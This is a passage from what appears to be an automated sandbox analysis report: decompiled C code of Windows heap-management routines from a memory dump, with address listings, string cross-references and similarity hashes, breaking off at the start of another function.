				if(( *(__ecx + 0xcc) ^  *0x1e498a68) != 0) {
					_push(_a4);
					_t513 = __edx;
					L11:
					_t246 = E1E3CA830(_t450, _t513);
					L7:
					return _t246;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
						_t430 = E1E3CDF24(__edx,  &_v12,  &_v16);
						__eflags = _t430;
						if(_t430 != 0) {
							_t157 = _t553 + 0x234;
							 *_t157 =  *(_t553 + 0x234) - _v16;
							__eflags =  *_t157;
						}
					}
					_t445 = _a4;
					_t514 = _t539;
					_v48 = _t539;
					L14:
					_t247 =  *((intOrPtr*)(_t539 + 6));
					__eflags = _t247;
					if(_t247 == 0) {
						_t541 = _t553;
					} else {
						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t541;
					}
					_t249 = 7 + _t445 * 8 + _t514;
					_v12 = _t249;
					__eflags =  *_t249 - 3;
					if( *_t249 == 3) {
						_v16 = _t514 + _t445 * 8 + 8;
						E1E3A9373(_t553, _t514 + _t445 * 8 + 8);
						_t452 = _v16;
						_v28 =  *(_t452 + 0x10);
						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
						_v36 =  *(_t452 + 0x14);
						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
						_t256 =  *(_t452 + 0x14);
						__eflags = _t256 - 0x7f000;
						if(_t256 >= 0x7f000) {
							_t142 = _t553 + 0x1ec;
							 *_t142 =  *(_t553 + 0x1ec) - _t256;
							__eflags =  *_t142;
							_t256 =  *(_t452 + 0x14);
						}
						_t513 = _v48;
						_t445 = _t445 + (_t256 >> 3) + 0x20;
						_a4 = _t445;
						_v40 = 1;
					} else {
						_t27 =  &_v36;
						 *_t27 = _v36 & 0x00000000;
						__eflags =  *_t27;
					}
					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
						_v44 = _t513;
						_t262 = E1E3AA9EF(_t541, _t513);
						__eflags = _a8;
						_v32 = _t262;
						if(_a8 != 0) {
							__eflags = _t262;
							if(_t262 == 0) {
								goto L19;
							}
						}
						__eflags =  *0x1e498748 - 1;
						if( *0x1e498748 >= 1) {
							__eflags = _t262;
							if(_t262 == 0) {
								_t415 =  *[fs:0x30];
								__eflags =  *(_t415 + 0xc);
								if( *(_t415 + 0xc) == 0) {
									_push("HEAP: ");
									E1E3AB150();
								} else {
									E1E3AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E1E3AB150();
								__eflags =  *0x1e497bc8;
								if( *0x1e497bc8 == 0) {
									__eflags = 1;
									E1E462073(_t445, 1, _t541, 1);
								}
								_t513 = _v48;
								_t445 = _a4;
							}
						}
						_t350 = _v40;
						_t480 = _t445 << 3;
						_v20 = _t480;
						_t481 = _t480 + _t513;
						_v24 = _t481;
						__eflags = _t350;
						if(_t350 == 0) {
							_t481 = _t481 + 0xfffffff0;
							__eflags = _t481;
						}
						_t483 = (_t481 & 0xfffff000) - _v44;
						__eflags = _t483;
						_v52 = _t483;
						if(_t483 == 0) {
							__eflags =  *0x1e498748 - 1;
							if( *0x1e498748 < 1) {
								goto L9;
							}
							__eflags = _t350;
							goto L146;
						} else {
							_t352 = E1E3D174B( &_v44,  &_v52, 0x4000);
							__eflags = _t352;
							if(_t352 < 0) {
								goto L94;
							}
							_t353 = E1E3C7D50();
							_t447 = 0x7ffe0380;
							__eflags = _t353;
							if(_t353 != 0) {
								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t356 = 0x7ffe0380;
							}
							__eflags =  *_t356;
							if( *_t356 != 0) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0x240) & 0x00000001;
								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
									E1E4614FB(_t447, _t553, _v44, _v52, 5);
								}
							}
							_t358 = _v32;
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t484 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t484 - 0x7f000;
							if(_t484 >= 0x7f000) {
								_t90 = _t553 + 0x1ec;
								 *_t90 =  *(_t553 + 0x1ec) - _t484;
								__eflags =  *_t90;
							}
							E1E3A9373(_t553, _t358);
							_t486 = _v32;
							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
							E1E3A9819(_t486);
							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
							_t366 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t366 - 0x7f000;
							if(_t366 >= 0x7f000) {
								_t104 = _t553 + 0x1ec;
								 *_t104 =  *(_t553 + 0x1ec) + _t366;
								__eflags =  *_t104;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t533 = _v52 + _v44;
								_v32 = _t533;
								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
								__eflags = _v24 - _v52 + _v44;
								if(_v24 == _v52 + _v44) {
									__eflags =  *(_t553 + 0x4c);
									if( *(_t553 + 0x4c) != 0) {
										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
									}
								} else {
									_t449 = 0;
									_t533[3] = 0;
									_t533[1] = 0;
									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t491 = _t394;
									 *_t533 = _t394;
									__eflags =  *0x1e498748 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t491 - 1;
										if(_t491 <= 1) {
											_t404 =  *[fs:0x30];
											__eflags =  *(_t404 + 0xc);
											if( *(_t404 + 0xc) == 0) {
												_push("HEAP: ");
												E1E3AB150();
											} else {
												E1E3AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("((LONG)FreeEntry->Size > 1)");
											E1E3AB150();
											_pop(_t491);
											__eflags =  *0x1e497bc8 - _t449; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												_t491 = 1;
												E1E462073(_t449, 1, _t541, 0);
											}
											_t533 = _v32;
										}
									}
									_t533[1] = _t449;
									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
										_t402 = (_t533 - _t541 >> 0x10) + 1;
										_v16 = _t402;
										__eflags = _t402 - 0xfe;
										if(_t402 >= 0xfe) {
											_push(_t491);
											_push(_t449);
											E1E46A80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
											_t533 = _v48;
											_t402 = _v32;
										}
										_t449 = _t402;
									}
									_t533[3] = _t449;
									E1E3CA830(_t553, _t533,  *_t533 & 0x0000ffff);
									_t447 = 0x7ffe0380;
								}
							}
							_t367 = E1E3C7D50();
							__eflags = _t367;
							if(_t367 != 0) {
								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t370 = _t447;
							}
							__eflags =  *_t370;
							if( *_t370 != 0) {
								_t371 =  *[fs:0x30];
								__eflags =  *(_t371 + 0x240) & 1;
								if(( *(_t371 + 0x240) & 1) != 0) {
									__eflags = E1E3C7D50();
									if(__eflags != 0) {
										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E1E461411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
								}
							}
							_t372 = E1E3C7D50();
							_t546 = 0x7ffe038a;
							_t446 = 0x230;
							__eflags = _t372;
							if(_t372 != 0) {
								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t246 = 0x7ffe038a;
							}
							__eflags =  *_t246;
							if( *_t246 == 0) {
								goto L7;
							} else {
								__eflags = E1E3C7D50();
								if(__eflags != 0) {
									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
									__eflags = _t546;
								}
								_push( *_t546 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								goto L120;
							}
						}
					} else {
						L19:
						_t31 = _t513 + 0x101f; // 0x101f
						_t455 = _t31 & 0xfffff000;
						_t32 = _t513 + 0x28; // 0x28
						_v44 = _t455;
						__eflags = _t455 - _t32;
						if(_t455 == _t32) {
							_t455 = _t455 + 0x1000;
							_v44 = _t455;
						}
						_t265 = _t445 << 3;
						_v24 = _t265;
						_t266 = _t265 + _t513;
						__eflags = _v40;
						_v20 = _t266;
						if(_v40 == 0) {
							_t266 = _t266 + 0xfffffff0;
							__eflags = _t266;
						}
						_t267 = _t266 & 0xfffff000;
						_v52 = _t267;
						__eflags = _t267 - _t455;
						if(_t267 < _t455) {
							__eflags =  *0x1e498748 - 1; // 0x0
							if(__eflags < 0) {
								L9:
								_t450 = _t553;
								L10:
								_push(_t445);
								goto L11;
							}
							__eflags = _v40;
							L146:
							if(__eflags == 0) {
								goto L9;
							}
							_t270 =  *[fs:0x30];
							__eflags =  *(_t270 + 0xc);
							if( *(_t270 + 0xc) == 0) {
								_push("HEAP: ");
								E1E3AB150();
							} else {
								E1E3AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("(!TrailingUCR)");
							E1E3AB150();
							__eflags =  *0x1e497bc8;
							if( *0x1e497bc8 == 0) {
								__eflags = 0;
								E1E462073(_t445, 1, _t541, 0);
							}
							L152:
							_t445 = _a4;
							L153:
							_t513 = _v48;
							goto L9;
						}
						_v32 = _t267;
						_t280 = _t267 - _t455;
						_v32 = _v32 - _t455;
						__eflags = _a8;
						_t460 = _v32;
						_v52 = _t460;
						if(_a8 != 0) {
							L27:
							__eflags = _t280;
							if(_t280 == 0) {
								L33:
								_t446 = 0;
								__eflags = _v40;
								if(_v40 == 0) {
									_t468 = _v44 + _v52;
									_v36 = _t468;
									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
									__eflags = _v20 - _v52 + _v44;
									if(_v20 == _v52 + _v44) {
										__eflags =  *(_t553 + 0x4c);
										if( *(_t553 + 0x4c) != 0) {
											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
										}
									} else {
										_t468[3] = 0;
										_t468[1] = 0;
										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
										_t521 = _t317;
										 *_t468 = _t317;
										__eflags =  *0x1e498748 - 1; // 0x0
										if(__eflags >= 0) {
											__eflags = _t521 - 1;
											if(_t521 <= 1) {
												_t327 =  *[fs:0x30];
												__eflags =  *(_t327 + 0xc);
												if( *(_t327 + 0xc) == 0) {
													_push("HEAP: ");
													E1E3AB150();
												} else {
													E1E3AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
												}
												_push("(LONG)FreeEntry->Size > 1");
												E1E3AB150();
												__eflags =  *0x1e497bc8 - _t446; // 0x0
												if(__eflags == 0) {
													__eflags = 1;
													E1E462073(_t446, 1, _t541, 1);
												}
												_t468 = _v36;
											}
										}
										_t468[1] = _t446;
										_t522 =  *((intOrPtr*)(_t541 + 0x18));
										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
											_t320 = _t446;
										} else {
											_t320 = (_t468 - _t541 >> 0x10) + 1;
											_v12 = _t320;
											__eflags = _t320 - 0xfe;
											if(_t320 >= 0xfe) {
												_push(_t468);
												_push(_t446);
												E1E46A80D(_t522, 3, _t468, _t541);
												_t468 = _v52;
												_t320 = _v28;
											}
										}
										_t468[3] = _t320;
										E1E3CA830(_t553, _t468,  *_t468 & 0x0000ffff);
									}
								}
								E1E3CB73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
								E1E3CA830(_t553, _v64, _v24);
								_t286 = E1E3C7D50();
								_t542 = 0x7ffe0380;
								__eflags = _t286;
								if(_t286 != 0) {
									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t289 = 0x7ffe0380;
								}
								__eflags =  *_t289;
								if( *_t289 != 0) {
									_t290 =  *[fs:0x30];
									__eflags =  *(_t290 + 0x240) & 1;
									if(( *(_t290 + 0x240) & 1) != 0) {
										__eflags = E1E3C7D50();
										if(__eflags != 0) {
											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										E1E461411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
									}
								}
								_t291 = E1E3C7D50();
								_t543 = 0x7ffe038a;
								__eflags = _t291;
								if(_t291 != 0) {
									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t246 = 0x7ffe038a;
								}
								__eflags =  *_t246;
								if( *_t246 != 0) {
									__eflags = E1E3C7D50();
									if(__eflags != 0) {
										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags = _t543;
									}
									_push( *_t543 & 0x000000ff);
									_push(_t446);
									_push(_t446);
									L120:
									_push( *(_t553 + 0x74) << 3);
									_push(_v52);
									_t246 = E1E461411(_t446, _t553, _v44, __eflags);
								}
								goto L7;
							}
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t339 = E1E3D174B( &_v44,  &_v52, 0x4000);
							__eflags = _t339;
							if(_t339 < 0) {
								L94:
								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									goto L153;
								}
								E1E3CB73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
								goto L152;
							}
							_t344 = E1E3C7D50();
							__eflags = _t344;
							if(_t344 != 0) {
								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t347 = 0x7ffe0380;
							}
							__eflags =  *_t347;
							if( *_t347 != 0) {
								_t348 =  *[fs:0x30];
								__eflags =  *(_t348 + 0x240) & 1;
								if(( *(_t348 + 0x240) & 1) != 0) {
									E1E4614FB(_t445, _t553, _v44, _v52, 6);
								}
							}
							_t513 = _v48;
							goto L33;
						}
						__eflags =  *_v12 - 3;
						_t513 = _v48;
						if( *_v12 == 3) {
							goto L27;
						}
						__eflags = _t460;
						if(_t460 == 0) {
							goto L9;
						}
						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
							goto L9;
						}
						goto L27;
					}
				}
				_t445 = _a4;
				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t513 = __edx;
					goto L10;
				}
				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
				_v20 = _t433;
				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
					_t513 = _t539;
					goto L9;
				} else {
					_t437 = E1E3C99BF(__ecx, __edx,  &_a4, 0);
					_t445 = _a4;
					_t514 = _t437;
					_v56 = _t514;
					if(_t445 - 0x201 > 0xfbff) {
						goto L14;
					} else {
						E1E3CA830(__ecx, _t514, _t445);
						_t506 =  *(_t553 + 0x238);
						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
						_t246 = _t506 >> 4;
						if(_t551 < _t506 - _t246) {
							_t508 =  *(_t553 + 0x23c);
							_t246 = _t508 >> 2;
							__eflags = _t551 - _t508 - _t246;
							if(_t551 > _t508 - _t246) {
								_t246 = E1E3DABD8(_t553);
								 *(_t553 + 0x23c) = _t551;
								 *(_t553 + 0x238) = _t551;
							}
						}
						goto L7;
					}
				}
			}

0x1e3ca309
0x1e3ca316
0x1e3ca319
0x1e3ca31d
0x1e3ca32d
0x1e3ca331
0x1e411e0d
0x1e411e10
0x1e3ca3cb
0x1e3ca3cb
0x1e3ca3bd
0x1e3ca3c3
0x1e3ca3c3
0x1e3ca33a
0x1e411e17
0x1e411e1b
0x1e411e1d
0x1e411e2f
0x1e411e34
0x1e411e36
0x1e411e3c
0x1e411e3c
0x1e411e3c
0x1e411e3c
0x1e411e36
0x1e411e42
0x1e411e45
0x1e411e47
0x1e3ca3f8
0x1e3ca3f8
0x1e3ca3fb
0x1e3ca3fd
0x1e411e50
0x1e3ca403
0x1e3ca411
0x1e3ca411
0x1e3ca411
0x1e3ca41e
0x1e3ca420
0x1e3ca424
0x1e3ca427
0x1e3ca7c9
0x1e3ca7cd
0x1e3ca7d2
0x1e3ca7d9
0x1e3ca7e0
0x1e3ca7e3
0x1e3ca7ed
0x1e3ca7f3
0x1e3ca7f9
0x1e3ca7ff
0x1e3ca802
0x1e3ca807
0x1e3ca809
0x1e3ca809
0x1e3ca809
0x1e3ca80f
0x1e3ca80f
0x1e3ca812
0x1e3ca81c
0x1e3ca821
0x1e3ca824
0x1e3ca42d
0x1e3ca42d
0x1e3ca42d
0x1e3ca42d
0x1e3ca42d
0x1e3ca436
0x1e3ca43a
0x1e3ca609
0x1e3ca60d
0x1e3ca612
0x1e3ca616
0x1e3ca61a
0x1e411e57
0x1e411e59
0x00000000
0x00000000
0x1e411e5f
0x1e3ca620
0x1e3ca627
0x1e411e64
0x1e411e66
0x1e411e6c
0x1e411e72
0x1e411e76
0x1e411e95
0x1e411e9a
0x1e411e78
0x1e411e8d
0x1e411e92
0x1e411ea0
0x1e411ea5
0x1e411eaa
0x1e411eb2
0x1e411eb6
0x1e411eb9
0x1e411eb9
0x1e411ebe
0x1e411ec2
0x1e411ec2
0x1e411e66
0x1e3ca62d
0x1e3ca633
0x1e3ca636
0x1e3ca63a
0x1e3ca63c
0x1e3ca640
0x1e3ca642
0x1e3ca644
0x1e3ca644
0x1e3ca644
0x1e3ca64d
0x1e3ca64d
0x1e3ca651
0x1e3ca655
0x1e411eca
0x1e411ed1
0x00000000
0x00000000
0x1e411ed7
0x00000000
0x1e3ca65b
0x1e3ca669
0x1e3ca66e
0x1e3ca670
0x00000000
0x00000000
0x1e3ca676
0x1e3ca67b
0x1e3ca680
0x1e3ca682
0x1e411f1a
0x1e3ca688
0x1e3ca688
0x1e3ca688
0x1e3ca68a
0x1e3ca68d
0x1e411f24
0x1e411f2a
0x1e411f31
0x1e411f43
0x1e411f43
0x1e411f31
0x1e3ca693
0x1e3ca697
0x1e3ca69d
0x1e3ca6a0
0x1e3ca6a6
0x1e3ca6a8
0x1e3ca6a8
0x1e3ca6a8
0x1e3ca6a8
0x1e3ca6b2
0x1e3ca6b7
0x1e3ca6c1
0x1e3ca6c6
0x1e3ca6d2
0x1e3ca6d9
0x1e3ca6e3
0x1e3ca6e6
0x1e3ca6eb
0x1e3ca6ed
0x1e3ca6ed
0x1e3ca6ed
0x1e3ca6ed
0x1e3ca6f3
0x1e3ca6f8
0x1e3ca702
0x1e3ca70a
0x1e3ca70e
0x1e3ca71a
0x1e3ca71e
0x1e411fcb
0x1e411fcf
0x1e411fdd
0x1e411fe3
0x1e411fe3
0x1e3ca724
0x1e3ca728
0x1e3ca72a
0x1e3ca72d
0x1e3ca737
0x1e3ca73a
0x1e3ca73c
0x1e3ca742
0x1e3ca748
0x1e411f4d
0x1e411f50
0x1e411f56
0x1e411f5c
0x1e411f5f
0x1e411f7e
0x1e411f83
0x1e411f61
0x1e411f76
0x1e411f7b
0x1e411f89
0x1e411f8e
0x1e411f93
0x1e411f94
0x1e411f9a
0x1e411f9c
0x1e411f9e
0x1e411fa1
0x1e411fa1
0x1e411fa6
0x1e411fa6
0x1e411f50
0x1e3ca74e
0x1e3ca751
0x1e3ca754
0x1e3ca75d
0x1e3ca75e
0x1e3ca762
0x1e3ca767
0x1e411faf
0x1e411fb0
0x1e411fb9
0x1e411fbe
0x1e411fc2
0x1e411fc2
0x1e3ca76d
0x1e3ca76d
0x1e3ca775
0x1e3ca778
0x1e3ca77d
0x1e3ca77d
0x1e3ca71e
0x1e3ca782
0x1e3ca787
0x1e3ca789
0x1e411ff3
0x1e3ca78f
0x1e3ca78f
0x1e3ca78f
0x1e3ca791
0x1e3ca794
0x1e411ffd
0x1e412006
0x1e41200c
0x1e412017
0x1e412019
0x1e412024
0x1e412024
0x1e412024
0x1e412047
0x1e412047
0x1e41200c
0x1e3ca79a
0x1e3ca79f
0x1e3ca7a4
0x1e3ca7a9
0x1e3ca7ab
0x1e41205a
0x1e3ca7b1
0x1e3ca7b1
0x1e3ca7b1
0x1e3ca7b3
0x1e3ca7b6
0x00000000
0x1e3ca7bc
0x1e412066
0x1e412068
0x1e412073
0x1e412073
0x1e412073
0x1e412078
0x1e412079
0x1e41207d
0x00000000
0x1e41207d
0x1e3ca7b6
0x1e3ca440
0x1e3ca440
0x1e3ca440
0x1e3ca446
0x1e3ca44c
0x1e3ca44f
0x1e3ca453
0x1e3ca455
0x1e4120b3
0x1e4120b9
0x1e4120b9
0x1e3ca45d
0x1e3ca460
0x1e3ca464
0x1e3ca466
0x1e3ca46b
0x1e3ca46f
0x1e3ca471
0x1e3ca471
0x1e3ca471
0x1e3ca474
0x1e3ca479
0x1e3ca47d
0x1e3ca47f
0x1e412229
0x1e41222f
0x1e3ca3c8
0x1e3ca3c8
0x1e3ca3ca
0x1e3ca3ca
0x00000000
0x1e3ca3ca
0x1e412235
0x1e41223a
0x1e41223a
0x00000000
0x00000000
0x1e412240
0x1e412246
0x1e41224a
0x1e412269
0x1e41226e
0x1e41224c
0x1e412261
0x1e412266
0x1e412274
0x1e412279
0x1e41227e
0x1e412286
0x1e412288
0x1e41228d
0x1e41228d
0x1e412292
0x1e412292
0x1e412295
0x1e412295
0x00000000
0x1e412295
0x1e3ca485
0x1e3ca489
0x1e3ca48b
0x1e3ca48f
0x1e3ca493
0x1e3ca497
0x1e3ca49b
0x1e3ca4bb
0x1e3ca4bb
0x1e3ca4bd
0x1e3ca4ff
0x1e3ca4ff
0x1e3ca501
0x1e3ca505
0x1e3ca50f
0x1e3ca517
0x1e3ca51b
0x1e3ca527
0x1e3ca52b
0x1e412182
0x1e412185
0x1e412193
0x1e412199
0x1e412199
0x1e3ca531
0x1e3ca535
0x1e3ca538
0x1e3ca548
0x1e3ca54b
0x1e3ca54d
0x1e3ca553
0x1e3ca559
0x1e412100
0x1e412103
0x1e412109
0x1e41210f
0x1e412112
0x1e412131
0x1e412136
0x1e412114
0x1e412129
0x1e41212e
0x1e41213c
0x1e412141
0x1e412147
0x1e41214d
0x1e412151
0x1e412154
0x1e412154
0x1e412159
0x1e412159
0x1e412103
0x1e3ca55f
0x1e3ca562
0x1e3ca565
0x1e3ca567
0x1e412162
0x1e3ca56d
0x1e3ca574
0x1e3ca575
0x1e3ca579
0x1e3ca57e
0x1e412169
0x1e41216a
0x1e412170
0x1e412175
0x1e412179
0x1e412179
0x1e3ca57e
0x1e3ca584
0x1e3ca58f
0x1e3ca58f
0x1e3ca52b
0x1e3ca5ad
0x1e3ca5bc
0x1e3ca5c1
0x1e3ca5c6
0x1e3ca5cb
0x1e3ca5cd
0x1e4121a9
0x1e3ca5d3
0x1e3ca5d3
0x1e3ca5d3
0x1e3ca5d5
0x1e3ca5d8
0x1e4121b3
0x1e4121bc
0x1e4121c2
0x1e4121cd
0x1e4121cf
0x1e4121da
0x1e4121da
0x1e4121da
0x1e4121f7
0x1e4121f7
0x1e4121c2
0x1e3ca5de
0x1e3ca5e3
0x1e3ca5e8
0x1e3ca5ea
0x1e41220a
0x1e3ca5f0
0x1e3ca5f0
0x1e3ca5f0
0x1e3ca5f2
0x1e3ca5f5
0x1e412219
0x1e41221b
0x1e41208c
0x1e41208c
0x1e41208c
0x1e412095
0x1e412096
0x1e412097
0x1e412098
0x1e4120a4
0x1e4120a5
0x1e4120a9
0x1e4120a9
0x00000000
0x1e3ca5f5
0x1e3ca4bf
0x1e3ca4d3
0x1e3ca4d8
0x1e3ca4da
0x1e411ede
0x1e411ede
0x1e411ee4
0x1e411ee9
0x00000000
0x00000000
0x1e411f07
0x00000000
0x1e411f07
0x1e3ca4e0
0x1e3ca4e5
0x1e3ca4e7
0x1e4120cb
0x1e3ca4ed
0x1e3ca4ed
0x1e3ca4ed
0x1e3ca4f2
0x1e3ca4f5
0x1e4120d5
0x1e4120de
0x1e4120e4
0x1e4120f6
0x1e4120f6
0x1e4120e4
0x1e3ca4fb
0x00000000
0x1e3ca4fb
0x1e3ca4a1
0x1e3ca4a4
0x1e3ca4a8
0x00000000
0x00000000
0x1e3ca4aa
0x1e3ca4ac
0x00000000
0x00000000
0x1e3ca4b2
0x1e3ca4b5
0x00000000
0x00000000
0x00000000
0x1e3ca4b5
0x1e3ca43a
0x1e3ca340
0x1e3ca346
0x1e3ca600
0x00000000
0x1e3ca600
0x1e3ca34f
0x1e3ca351
0x1e3ca358
0x1e3ca3c6
0x00000000
0x1e3ca371
0x1e3ca37a
0x1e3ca37f
0x1e3ca382
0x1e3ca384
0x1e3ca394
0x00000000
0x1e3ca396
0x1e3ca399
0x1e3ca3a7
0x1e3ca3b0
0x1e3ca3b4
0x1e3ca3bb
0x1e3ca3d2
0x1e3ca3da
0x1e3ca3df
0x1e3ca3e1
0x1e3ca3e5
0x1e3ca3ea
0x1e3ca3f0
0x1e3ca3f0
0x1e3ca3e1
0x00000000
0x1e3ca3bb
0x1e3ca394

Strings

((LONG)FreeEntry->Size > 1), xrefs: 1E411F89
HEAP[%wZ]: , xrefs: 1E411E88, 1E411F71, 1E412124, 1E41225C
(LONG)FreeEntry->Size > 1, xrefs: 1E41213C
HEAP: , xrefs: 1E411E95, 1E411F7E, 1E412131, 1E412269
(!TrailingUCR), xrefs: 1E412274
(UCRBlock != NULL), xrefs: 1E411EA0

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: 2f2788b9b32c032b0a5e53db0c115d364dff1fb4e7d6be23cd665ec0d0492c7f
Instruction ID: 84ec4c89616f570e523953fbb51e14b64ba03952e8c03c6798555e79a3ff9463
Opcode Fuzzy Hash: 2f2788b9b32c032b0a5e53db0c115d364dff1fb4e7d6be23cd665ec0d0492c7f
Instruction Fuzzy Hash: D442AE756187819FC705CF25C894B6ABBE6FF88604F044B6EE886CB351D734E982CB52

Uniqueness

Uniqueness Score: -1.00%

Function 1E3CB477, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 405
COMMONCrypto

Download Yara Rule

C-Code - Quality: 67%

			E1E3CB477(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int* _v20;
				signed int _v24;
				char _v28;
				signed int _v44;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t139;
				void* _t141;
				signed int* _t143;
				signed int* _t144;
				intOrPtr* _t147;
				char _t160;
				signed int* _t163;
				signed char* _t164;
				intOrPtr _t165;
				signed int* _t167;
				signed char* _t168;
				intOrPtr _t193;
				intOrPtr* _t195;
				signed int _t203;
				signed int _t209;
				signed int _t211;
				intOrPtr _t214;
				intOrPtr* _t231;
				intOrPtr* _t236;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t240;
				intOrPtr _t241;
				char _t243;
				signed int _t252;
				signed int _t254;
				signed char _t259;
				signed int _t264;
				signed int _t268;
				intOrPtr _t277;
				unsigned int _t279;
				signed int* _t283;
				intOrPtr* _t284;
				unsigned int _t287;
				signed int _t291;
				signed int _t293;

				_v8 =  *0x1e49d360 ^ _t293;
				_t223 = __edx;
				_v20 = __edx;
				_t291 = __ecx;
				_t276 =  *__edx;
				_t231 = E1E3CB8E4( *__edx);
				_t292 = __ecx + 0x8c;
				_v16 = _t231;
				if(_t231 == __ecx + 0x8c) {
					L38:
					_t131 = 0;
					L34:
					return E1E3EB640(_t131, _t223, _v8 ^ _t293, _t276, _t291, _t292);
				}
				if( *0x1e498748 >= 1) {
					__eflags =  *((intOrPtr*)(_t231 + 0x14)) -  *__edx;
					if(__eflags < 0) {
